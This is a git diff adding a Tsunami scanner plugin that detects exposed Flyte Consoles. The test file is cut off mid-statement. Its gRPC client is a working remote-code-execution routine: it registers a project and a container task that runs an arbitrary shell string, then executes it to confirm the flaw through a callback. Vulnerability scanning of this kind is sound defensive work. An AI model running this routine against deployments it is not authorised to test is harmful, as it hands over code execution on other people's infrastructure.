diff --git a/community/detectors/flyte_exposed_console/README.md b/community/detectors/flyte_exposed_console/README.md new file mode 100644 index 000000000..82627c47a --- /dev/null +++ b/community/detectors/flyte_exposed_console/README.md @@ -0,0 +1,13 @@ +# Exposed Flyte Console Detector + +This Tsunami plugin identifies publicly exposed Flyte Consoles. Once detected, it creates a project and task within the console, executes the task to run remote code, and then receives a callback at the Tsunami callback server. + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/flyte_exposed_console/build.gradle b/community/detectors/flyte_exposed_console/build.gradle new file mode 100644 index 000000000..735894bda --- /dev/null +++ b/community/detectors/flyte_exposed_console/build.gradle @@ -0,0 +1,79 @@ +plugins { + id 'java-library' +} + +description = 'Tsunami detector for exposed flyte console.' +group = 'com.google.tsunami' +version = '0.0.1-SNAPSHOT' + +repositories { + + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/javase/8/docs/api/' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + tsunamiVersion = 'latest.release' + junitVersion = '4.13' + mockitoVersion = '2.28.2' + truthVersion = '1.0.1' + guiceVersion = '4.2.3' + jsoupVersion = '1.9.2' + flyteVersion = '0.4.60' +} + +dependencies { + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + implementation "org.flyte:flyteidl-protos:${flyteVersion}" + + testImplementation "junit:junit:${junitVersion}" + testImplementation "com.google.inject:guice:${guiceVersion}" + testImplementation "com.google.inject.extensions:guice-testlib:${guiceVersion}" + testImplementation "org.mockito:mockito-core:${mockitoVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" +} +jar { + from { + configurations.runtimeClasspath.findAll { + it.name.contains("flyte") + }.collect { zipTree(it) } + } +} diff --git a/community/detectors/flyte_exposed_console/settings.gradle b/community/detectors/flyte_exposed_console/settings.gradle new file mode 100644 index 000000000..cc86318fd --- /dev/null +++ b/community/detectors/flyte_exposed_console/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'flyte_exposed_console' diff --git a/community/detectors/flyte_exposed_console/src/main/java/com/google/tsunami/plugins/rce/ExposedFlyteConsoleDetector.java b/community/detectors/flyte_exposed_console/src/main/java/com/google/tsunami/plugins/rce/ExposedFlyteConsoleDetector.java new file mode 100644 index 000000000..709594739 --- /dev/null +++ b/community/detectors/flyte_exposed_console/src/main/java/com/google/tsunami/plugins/rce/ExposedFlyteConsoleDetector.java @@ -0,0 +1,227 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.rce; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.tsunami.common.net.http.HttpRequest.get; + +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.ForWebService; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.NotImplementedException; +import com.google.tsunami.plugin.payload.Payload; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionReportList.Builder; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Clock; +import java.time.Instant; +import java.util.regex.Pattern; +import javax.inject.Inject; + +/** A VulnDetector plugin for Exposed Flyte Console Server. */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "Exposed Flyte Console Detector", + version = "0.1", + description = + "This detector identifies instances of exposed Flyte Console, " + + "which could potentially allow for remote code execution (RCE).", + author = "hayageek", + bootstrapModule = ExposedFlyteConsoleDetectorModule.class) +@ForWebService +public final class ExposedFlyteConsoleDetector implements VulnDetector { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + @VisibleForTesting static final String VULNERABILITY_REPORT_PUBLISHER = "TSUNAMI_COMMUNITY"; + @VisibleForTesting static final String VULNERABILITY_REPORT_ID = "FLYTE_CONSOLE_EXPOSED"; + + @VisibleForTesting static final String VULNERABILITY_REPORT_TITLE = "Exposed Flyte Console"; + + @VisibleForTesting + static final String VULN_DESCRIPTION = + "An exposed Flyte Console can lead to severe security risks, " + + "including unauthorized access and potential remote code execution (RCE). " + + "Ensure that access controls and security measures are properly configured " + + "to prevent exploitation. Please refer to the remediation guidance section " + + "below for mitigation strategies."; + + @VisibleForTesting + static final String RECOMMENDATION = + "Please disable public access to your flyte console instance."; + + @VisibleForTesting + private static final Pattern VULNERABILITY_RESPONSE_PATTERN = Pattern.compile("Flyte"); + + @VisibleForTesting FlyteProtoClient flyteClient = new FlyteProtoClient(); + + private static final int MAX_TIMEOUT_FOR_RCE_IN_SECS = 180; + private final Clock utcClock; + private final HttpClient httpClient; + private final PayloadGenerator payloadGenerator; + + @Inject + ExposedFlyteConsoleDetector( + @UtcClock Clock utcClock, HttpClient httpClient, PayloadGenerator payloadGenerator) { + this.utcClock = checkNotNull(utcClock); + this.httpClient = checkNotNull(httpClient).modify().setFollowRedirects(true).build(); + this.payloadGenerator = checkNotNull(payloadGenerator); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList<NetworkService> matchedServices) { + + Builder detectionReport = DetectionReportList.newBuilder(); + matchedServices.stream() + .filter(NetworkServiceUtils::isWebService) + .filter(this::isFlyteConsole) + .forEach( + networkService -> { + if (isVulnerable(networkService)) { + detectionReport.addDetectionReports( + buildDetectionReport( + targetInfo, + networkService, + "Flyte Console is misconfigured and can be accessed publicly, potentially" + + " leading to Remote Code Execution (RCE). Tsunami security scanner" + + " confirmed this by sending an HTTP request with a test connection" + + " API and receiving the corresponding callback on the tsunami" + + " callback server.", + Severity.CRITICAL)); + } + }); + return detectionReport.build(); + } + + public boolean isFlyteConsole(NetworkService networkService) { + logger.atInfo().log("probing flyte console home page "); + String rootUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService); + var consolePageUrl = String.format("%s%s", rootUrl, "console"); + try { + HttpResponse loginResponse = + this.httpClient.send(get(consolePageUrl).withEmptyHeaders().build()); + if ((loginResponse.status() == HttpStatus.OK && loginResponse.bodyString().isPresent())) { + String responseBody = loginResponse.bodyString().get(); + if (VULNERABILITY_RESPONSE_PATTERN.matcher(responseBody).find()) { + return true; + } + } + + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", consolePageUrl); + } + logger.atWarning().log("unable to find flight console "); + + return false; + } + + @Override + public ImmutableList<Vulnerability> getAdvisories() { + return ImmutableList.of( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher(VULNERABILITY_REPORT_PUBLISHER) + .setValue(VULNERABILITY_REPORT_ID)) + .setSeverity(Severity.CRITICAL) + .setTitle(VULNERABILITY_REPORT_TITLE) + .setDescription(VULN_DESCRIPTION) + .setRecommendation(RECOMMENDATION) + .build()); + } + + private boolean isVulnerable(NetworkService networkService) { + Payload payload = getTsunamiCallbackHttpPayload(); + if (payload == null || !payload.getPayloadAttributes().getUsesCallbackServer()) { + logger.atWarning().log("Tsunami callback server is not setup for this environment."); + return false; + } + + String rootUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService); + try { + + // Set the URL and build the client. + flyteClient.buildService(rootUrl); + + // Run the RCE and check the status in loop, until MAX_TIMEOUT_FOR_RCE_IN_SECS + String payloadString = payload.getPayload(); + flyteClient.runShellScript(payloadString, MAX_TIMEOUT_FOR_RCE_IN_SECS); + + return payload.checkIfExecuted(); + } catch (Exception e) { + logger.atWarning().withCause(e).log("Failed to send request.%s", e.getMessage()); + return false; + } + } + + private Payload getTsunamiCallbackHttpPayload() { + try { + return this.payloadGenerator.generate( + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.REFLECTIVE_RCE) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL) + .setExecutionEnvironment( + PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT) + .build()); + } catch (NotImplementedException n) { + n.printStackTrace(); + return null; + } + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, + NetworkService vulnerableNetworkService, + String description, + Severity severity) { + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher(VULNERABILITY_REPORT_PUBLISHER) + .setValue(VULNERABILITY_REPORT_ID)) + .setSeverity(severity) + .setTitle(VULNERABILITY_REPORT_TITLE) + .setDescription(VULN_DESCRIPTION) + .setRecommendation(RECOMMENDATION)) + .build(); + } +} diff --git a/community/detectors/flyte_exposed_console/src/main/java/com/google/tsunami/plugins/rce/ExposedFlyteConsoleDetectorModule.java b/community/detectors/flyte_exposed_console/src/main/java/com/google/tsunami/plugins/rce/ExposedFlyteConsoleDetectorModule.java new file mode 100644 index 000000000..76c5d8f28 --- /dev/null +++ b/community/detectors/flyte_exposed_console/src/main/java/com/google/tsunami/plugins/rce/ExposedFlyteConsoleDetectorModule.java @@ -0,0 +1,27 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.rce; + +import com.google.tsunami.plugin.PluginBootstrapModule; + +/** A module registering the detector for Exposed Flyte Console. */ +public final class ExposedFlyteConsoleDetectorModule extends PluginBootstrapModule { + @Override + protected void configurePlugin() { + registerPlugin(ExposedFlyteConsoleDetector.class); + } +} diff --git a/community/detectors/flyte_exposed_console/src/main/java/com/google/tsunami/plugins/rce/FlyteProtoClient.java b/community/detectors/flyte_exposed_console/src/main/java/com/google/tsunami/plugins/rce/FlyteProtoClient.java new file mode 100644 index 000000000..7d9e047ae --- /dev/null +++ b/community/detectors/flyte_exposed_console/src/main/java/com/google/tsunami/plugins/rce/FlyteProtoClient.java @@ -0,0 +1,532 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.rce; + +import com.google.common.flogger.GoogleLogger; +import com.google.common.util.concurrent.Uninterruptibles; +import com.google.protobuf.Duration; +import com.google.protobuf.Struct; +import flyteidl.admin.ExecutionOuterClass.Execution; +import flyteidl.admin.ExecutionOuterClass.ExecutionCreateRequest; +import flyteidl.admin.ExecutionOuterClass.ExecutionCreateResponse; +import flyteidl.admin.ExecutionOuterClass.ExecutionMetadata; +import flyteidl.admin.ExecutionOuterClass.ExecutionMetadata.ExecutionMode; +import flyteidl.admin.ExecutionOuterClass.ExecutionSpec; +import flyteidl.admin.ExecutionOuterClass.WorkflowExecutionGetRequest; +import flyteidl.admin.ProjectOuterClass; +import flyteidl.admin.ProjectOuterClass.Project; +import flyteidl.admin.ProjectOuterClass.ProjectListRequest; +import flyteidl.admin.ProjectOuterClass.ProjectRegisterRequest; +import flyteidl.admin.ProjectOuterClass.ProjectRegisterResponse; +import flyteidl.admin.ProjectOuterClass.Projects; +import flyteidl.admin.TaskOuterClass.TaskCreateRequest; +import flyteidl.admin.TaskOuterClass.TaskCreateResponse; +import flyteidl.admin.TaskOuterClass.TaskSpec; +import flyteidl.core.Execution.WorkflowExecution.Phase; +import flyteidl.core.IdentifierOuterClass.Identifier; +import flyteidl.core.IdentifierOuterClass.ResourceType; +import flyteidl.core.IdentifierOuterClass.WorkflowExecutionIdentifier; +import flyteidl.core.Interface.TypedInterface; +import flyteidl.core.Interface.VariableMap; +import flyteidl.core.Literals; +import flyteidl.core.Literals.Literal; +import flyteidl.core.Literals.Primitive; +import flyteidl.core.Literals.RetryStrategy; +import flyteidl.core.Literals.Scalar; +import flyteidl.core.Tasks; +import flyteidl.core.Tasks.Container; +import flyteidl.core.Tasks.DataLoadingConfig; +import flyteidl.core.Tasks.RuntimeMetadata; +import flyteidl.core.Tasks.RuntimeMetadata.RuntimeType; +import flyteidl.core.Tasks.TaskMetadata; +import flyteidl.core.Tasks.TaskTemplate; +import flyteidl.service.AdminServiceGrpc; +import flyteidl.service.AdminServiceGrpc.AdminServiceBlockingStub; +import io.grpc.ManagedChannel; +import io.grpc.ManagedChannelBuilder; +import java.net.URI; +import java.net.URISyntaxException; +import java.util.Arrays; + +/** + * FlyteProtoClient is a gRPC client for interacting with the Flyte Admin + * service. + * It allows you to list projects, workflows, and potentially other entities in + * a Flyte deployment. + */ +public class FlyteProtoClient { + + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + private static final String MY_TASK_TYPE = "container"; + + private static final String CONTAINER_NAME = "docker.io/nginx:latest"; + private static final String INPUT_PATH = "/tmp"; + private static final String OUT_PATH = "/tmp"; + private static final String SHELL_PATH = "sh"; + private static final String DOMAIN = "development"; + private static final int WAIT_TIME_SECS_FOR_EXECUTION_STATUS = 5; + + private static final String PROJECT_NAME = "flytesnacks"; + private static final String TASK_NAME = "tsunamirce"; + private static final int TASK_EXECUTION_TIMEOUT_SECS = 180; + // Stub generated by gRPC that allows remote procedure calls (RPC) to the Flyte + // Admin service. + AdminServiceBlockingStub flyteService; + + FlyteProtoClient() { + } + + /** + * Sets the gRPC stub for interacting with the Flyte Admin service. + * + * @param stub The AdminServiceBlockingStub instance to be set. + */ + public void setStub(AdminServiceBlockingStub stub) { + this.flyteService = stub; + } + + /** + * Establishes a connection to the Flyte server and initializes the gRPC service + * stub. + * + * @param url The URL of the Flyte server to connect to. This should include + * both the + * host and port in the format "http://host:port". + * @throws URISyntaxException + */ + public void buildService(String url) throws URISyntaxException { + + URI uri = new URI(url); + String target = String.format("%s:%s", uri.getHost(), uri.getPort()); + // Managed channel for establishing a connection to the Flyte server. + ManagedChannelBuilder<?> channelBuilder = ManagedChannelBuilder.forTarget(target); + if (uri.getScheme() == "https") { + channelBuilder.useTransportSecurity(); + } else { + channelBuilder.usePlaintext(); + } + ManagedChannel channel = channelBuilder.enableRetry().build(); + + this.flyteService = AdminServiceGrpc.newBlockingStub(channel); + } + + private static Literal asLiteral(Literals.Primitive primitive) { + Scalar scalar = Scalar.newBuilder() + .setPrimitive(primitive) + .build(); + return Literal.newBuilder() + .setScalar(scalar) + .build(); + } + + public static Literals.Literal ofString(String value) { + Primitive primitive = Primitive.newBuilder() + .setStringValue(value) + .build(); + return asLiteral(primitive); + } + + /** + * Waits for an execution ID to be generated for a specified task. + * + * @param project The project in which the task is to be run. + * @param taskName The name of the task. + * @param taskVersion The version of the task. + * @param maxTimeOutInSecs The maximum time to wait for the execution ID in + * seconds. + * @return The execution ID if generated within the timeout period; otherwise, + * returns null. + */ + + public String waitForTheExecutionId(String project, String taskName, String taskVersion, int maxTimeOutInSecs) { + + int waitTimeInSecs = 20; + int loops = maxTimeOutInSecs / waitTimeInSecs; + + for (int i = 0; i < loops; i++) { + String executionId = this.runTask(project, taskName, taskVersion); + if (executionId != null) { + return executionId; + } + logger.atFine().log("Unble to run the task in flyte, retrying"); + Uninterruptibles.sleepUninterruptibly(java.time.Duration.ofSeconds(waitTimeInSecs)); + } + return null; + } + + /** + * Waits for a script execution to finish in the Flyte Console. + * + * This method checks the status of a Flyte task execution at regular intervals + * until the task is completed or the maximum timeout is reached. It logs a + * message + * when the task completes successfully. + * + * The method divides the total maximum timeout into smaller intervals (default + * is + * WAIT_TIME_SECS_FOR_EXECUTION_STATUS seconds) and checks the execution status + * in each interval. If the task is + * found + * to be complete, the loop is terminated early. + * + * @param project The name of the project in Flyte where the task is + * executed. + * @param executionId The unique identifier of the task execution. + * @param maxTimeOutInSecs The maximum time (in seconds) to wait for the task to + * complete. + */ + + public void waitForTheScriptToFinish(String project, String executionId, int maxTimeOutInSecs) { + + int waitTimeInSecs = WAIT_TIME_SECS_FOR_EXECUTION_STATUS; + + // Calculate the number of loops based on the maximum timeout. + int loops = maxTimeOutInSecs / waitTimeInSecs; + for (int i = 0; i < loops; i++) { + boolean status = this.checkExecutionRunning(project, executionId); + // If the task is completed break the loop. + if (status == false) { + logger.atInfo().log("Task completed successfully in the Flyte Console"); + break; + } + // Wait for a defined interval before checking the status again. + Uninterruptibles.sleepUninterruptibly( + java.time.Duration.ofSeconds(WAIT_TIME_SECS_FOR_EXECUTION_STATUS)); + } + } + + /** + * Executes a shell script using Flyte Console by creating a project, task, and + * waiting for the task's execution. + * + * @param shellScript The shell script to be executed. + * @param maxTimeout The maximum time in seconds to wait for the script to + * complete. + */ + + public void runShellScript(String shellScript, int maxTimeout) { + + // Generate a unique task version using the current timestamp. + String taskVersion = String.format("v%d", (int) (System.currentTimeMillis() / 1000)); + + // 1.Check if the project exists in Flyte Console. + boolean projectExists = this.checkProjectExists(PROJECT_NAME); + + // 2. If the project does not exist, attempt to create it. + if (!projectExists) { + + projectExists = this.createProject(PROJECT_NAME); + } + if (projectExists) { + // 3. Create a Task in the Flyte Console with the provided shell script. + boolean taskCreated = this.createTask(PROJECT_NAME, TASK_NAME, taskVersion, shellScript); + + if (taskCreated) { + // 4. Run the task and wait for an execution ID. + // When a new project is created, configuring the task may take some time. We + // need to retry the process multiple times. + String executionId = this.waitForTheExecutionId(PROJECT_NAME, TASK_NAME, taskVersion, + TASK_EXECUTION_TIMEOUT_SECS); + + // If an execution ID is returned, wait for the script to finish executing. + if (executionId != null) { + this.waitForTheScriptToFinish(PROJECT_NAME, executionId, maxTimeout); + } else { + logger.atSevere().log( + "Unable to run task in Flyte Console with project: %s , task:%s, version:%s", + PROJECT_NAME, TASK_NAME, taskVersion); + } + } else { + logger.atSevere().log( + "Unable to create task in Flyte Console with project: %s , task:%s, version:%s", + PROJECT_NAME, TASK_NAME, taskVersion); + } + + } else { + logger.atSevere().log("Unable to create project in Flyte Console with name : %s", PROJECT_NAME); + } + + } + + /** + * Checks if a project with the specified ID exists in the Flyte Console. + * + * This method sends a request to the Flyte Admin Service to retrieve a list of + * all projects. + * It then iterates through the list to check if any project matches the given + * project ID. + * If a match is found, the method returns true, indicating that the project + * exists. + * If no match is found, it returns false. + * + * @param project_id The ID of the project to check for existence. + * @return true if the project exists, false otherwise. + */ + public boolean checkProjectExists(String project_id) { + ProjectListRequest request = ProjectListRequest.newBuilder() + .build(); + // Send the request and retrieve the list of projects. + Projects projects = flyteService.listProjects(request); + for (int i = 0; i < projects.getProjectsCount(); i++) { + ProjectOuterClass.Project project = projects.getProjects(i); + // Check if the current project's ID matches the provided project ID. + if (project.getId().equals(project_id)) { + // Project exists, return true. + return true; + } + } + // If no matching project ID is found, return false. + return false; + } + + /** + * Creates a new project in the Flyte Console with the specified name. + * + * This method constructs a new `Project` object with the provided project name + * and sends a request to the Flyte Admin Service to register the project. + * After attempting to register the project, the method checks if the project + * was successfully created by verifying its existence in the project list. + * + * @param projectName The name of the project to be created. + * @return true if the project was successfully created and exists, false + * otherwise. + */ + public boolean createProject(String projectName) { + + Project project = Project.newBuilder() + .setId(projectName) + .setName(projectName) + .build(); + + ProjectRegisterRequest request = ProjectRegisterRequest.newBuilder() + .setProject(project) + .build(); + // Send the registration request and receive a response. + ProjectRegisterResponse response = flyteService.registerProject(request); + if (response != null) { + return this.checkProjectExists(projectName); + } + // Return false if the project registration failed. + return false; + } + + /** + * Creates a new task in the Flyte Console within a specified project. + * + * This method builds a task with the given project, task name, version, and + * shell script. + * The task is configured to spawn a Docker container in the cluster, execute + * the shell script, + * and handle basic retry and runtime settings. The task creation request is + * sent to the Flyte + * Admin Service, and the method returns true if the task is successfully + * created. + * + * @param project The name of the project in which the task will be created. + * @param taskName The name of the task to be created. + * @param version The version of the task. + * @param shellScript The shell script to be executed by the task. + * @return true if the task was successfully created, false otherwise. + */ + + public boolean createTask(String project, String taskName, String version, String shellScript) { + + try { + logger.atFine().log("Creating task with project=%s, task=%s, version=%s, shellScript=%s", + project, taskName, version, shellScript); + + Identifier taskId = Identifier.newBuilder() + .setResourceType(ResourceType.TASK) + .setDomain(DOMAIN) + .setProject(project) + .setName(taskName) + .setVersion(version) + .build(); + + TypedInterface taskInterface = TypedInterface.newBuilder() + .setInputs(VariableMap.newBuilder().build()) + .setOutputs(VariableMap.newBuilder().build()) + .build(); + + RetryStrategy RETRIES = RetryStrategy.newBuilder() + .setRetries(1) + .build(); + + // Define the container that will be spawned in the cluster to run the shell + // script. + Container container = Container.newBuilder() + .setImage(CONTAINER_NAME) + .setDataConfig(DataLoadingConfig.newBuilder() + .setInputPath(INPUT_PATH) + .setOutputPath(OUT_PATH).build()) + .addAllArgs(Arrays.asList("-c", shellScript)) + .addCommand(SHELL_PATH) + .build(); + + RuntimeMetadata runMetadata = RuntimeMetadata.newBuilder() + .setType(RuntimeType.FLYTE_SDK) + .setVersion("0.0.1") + .setFlavor("java") + .build(); + + TaskMetadata metadata = TaskMetadata.newBuilder() + .setDiscoverable(false) + .setCacheSerializable(false) + .setTimeout(Duration.newBuilder().setSeconds(180).build()) + .setRetries(RETRIES) + .setRuntime(runMetadata) + .build(); + + Tasks.TaskTemplate taskTemplate = TaskTemplate.newBuilder() + .setType(MY_TASK_TYPE) + .setInterface(taskInterface) + .setContainer(container) + .setMetadata(metadata) + .setCustom(Struct.newBuilder().build()) + .build(); + + TaskCreateRequest request = TaskCreateRequest.newBuilder() + .setId(taskId) + .setSpec(TaskSpec.newBuilder() + .setTemplate(taskTemplate) + .build()) + .build(); + + TaskCreateResponse response = flyteService.createTask(request); + // Return true if the task creation was successful, otherwise return false. + if (response != null) { + return true; + } + } catch (Exception e) { + logger.atSevere().log( + "Exception while creating task with project: %s , task:%s, version:%s", + project, taskName, version); + } + + return false; + } + + /** + * Runs a task in Flyte Console by creating an execution request and returning + * the execution ID. + * + * @param project The name of the project where the task is to be run. + * @param taskName The name of the task to be executed. + * @param version The version of the task to be executed. + * @return The execution ID if the task is successfully executed; otherwise, + * returns null. + */ + + public String runTask(String project, String taskName, String version) { + + try { + logger.atFine().log("Running Task with project=%s, task=%s, version=%s,", + project, taskName, version); + + Identifier launchId = Identifier.newBuilder() + .setResourceType(ResourceType.TASK) + .setProject(project) + .setDomain(DOMAIN) + .setName(taskName) + .setVersion(version) + .build(); + + ExecutionMetadata metadata = ExecutionMetadata.newBuilder() + .setMode(ExecutionMode.MANUAL) + .setPrincipal("flyteconsole") + .build(); + + ExecutionSpec executionSpec = ExecutionSpec.newBuilder() + .setMetadata(metadata) + .setLaunchPlan(launchId) + // .setInputs(LiteralMap.newBuilder().build()) + .build(); + + ExecutionCreateRequest request = ExecutionCreateRequest.newBuilder() + .setDomain(DOMAIN) + .setProject(project) + .setSpec(executionSpec) + .build(); + ExecutionCreateResponse response = flyteService.createExecution(request); + if (response != null && response.getId() != null) { + logger.atInfo().log("Execution created with ID " + response.getId().getName()); + // Execution ID + return response.getId().getName(); + } + } catch (Exception e) { + // TODO: handle exception + } + return null; + + } + + private boolean isRunning(Phase phase) { + switch (phase) { + case SUCCEEDING: + case QUEUED: + case RUNNING: + case UNDEFINED: + return true; + case TIMED_OUT: + case SUCCEEDED: + case ABORTED: + case ABORTING: + case FAILED: + case FAILING: + case UNRECOGNIZED: + return false; + } + + return false; + } + + /** + * Checks if a specific workflow execution is still running in the Flyte + * Console. + * + * This method sends a request to the Flyte Admin Service to retrieve the + * current status + * of a workflow execution identified by the project name and execution ID. If + * the response + * is not null, it checks the phase of the execution to determine if it is still + * running. + * The method returns true if the execution is running, otherwise it returns + * false. + * + * @param project The name of the project in which the workflow is executed. + * @param executionId The unique identifier of the workflow execution. + * @return true if the execution is still running, false otherwise. + */ + public boolean checkExecutionRunning(String project, String executionId) { + + WorkflowExecutionGetRequest request = WorkflowExecutionGetRequest.newBuilder() + .setId(WorkflowExecutionIdentifier.newBuilder() + .setName(executionId) + .setDomain(DOMAIN) + .setProject(project).build()) + .build(); + + Execution resp = flyteService.getExecution(request); + // If the response is not null, check if the execution is still running. + if (resp != null && resp.getClosure() != null) { + return this.isRunning(resp.getClosure().getPhase()); + } + + return false; + } + +} \ No newline at end of file diff --git a/community/detectors/flyte_exposed_console/src/test/java/com/google/tsunami/plugins/rce/ExposedFlyteConsoleDetectorTest.java b/community/detectors/flyte_exposed_console/src/test/java/com/google/tsunami/plugins/rce/ExposedFlyteConsoleDetectorTest.java new file mode 100644 index 000000000..ef157fa89 --- /dev/null +++ b/community/detectors/flyte_exposed_console/src/test/java/com/google/tsunami/plugins/rce/ExposedFlyteConsoleDetectorTest.java @@ -0,0 +1,140 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.rce; + +import static com.google.common.truth.Truth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname; + +import com.google.common.collect.ImmutableList; +import com.google.inject.Guice; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.plugin.payload.testing.PayloadTestHelper; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.TargetInfo; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import okhttp3.mockwebserver.RecordedRequest; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; +import java.io.IOException; +import java.net.URISyntaxException; +import java.time.Instant; +import javax.inject.Inject; + +/** Unit tests for the {@link ExposedFlyteConsoleDetector}. */ +@RunWith(JUnit4.class) +public final class ExposedFlyteConsoleDetectorTest { + private final MockWebServer mockTargetService = new MockWebServer(); + private final MockWebServer mockCallbackServer = new MockWebServer(); + private final FakeUtcClock fakeUtcClock = FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); + private static final String MOCK_RESPONSE_BODY = "<meta name=\"viewport\" content=\"width=device-width,initial-scale=1\">" + + "<meta name=\"description\" content=\"Dashboard values to monitor your FlyteConsole instance\">" + + "<title>Flyte Dashboard"; + + @Inject + private ExposedFlyteConsoleDetector detector; + + @Before + public void setUp() throws IOException { + + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder().setCallbackServer(mockCallbackServer).build(), + new ExposedFlyteConsoleDetectorModule()) + .injectMembers(this); + } + + @After + public void tearDown() throws Exception { + mockTargetService.shutdown(); + mockCallbackServer.shutdown(); + } + + /* + * /console path does not exist. + */ + @Test + public void detect_when_endpoint_is_not_console() throws IOException, + InterruptedException { + + NetworkService service = 